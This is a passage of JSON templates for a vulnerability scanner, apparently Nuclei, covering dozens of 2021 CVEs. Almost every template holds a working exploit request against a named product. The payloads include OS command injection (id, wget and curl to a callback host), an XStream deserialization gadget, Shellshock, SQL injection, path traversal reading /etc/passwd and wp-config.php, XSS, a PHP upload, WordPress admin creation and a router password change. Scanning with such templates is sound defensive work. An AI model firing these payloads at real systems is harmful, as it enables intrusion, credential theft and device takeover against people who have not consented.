Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(id>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,'uid=') && contains(body_2,'gid=')","status_code_1 == 500 && status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\n","GET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1","contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')"],"condition":"and"}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"CVE-2021-24499\"); ?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["71abe5077dae2754c36d731cc1534d4d"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: 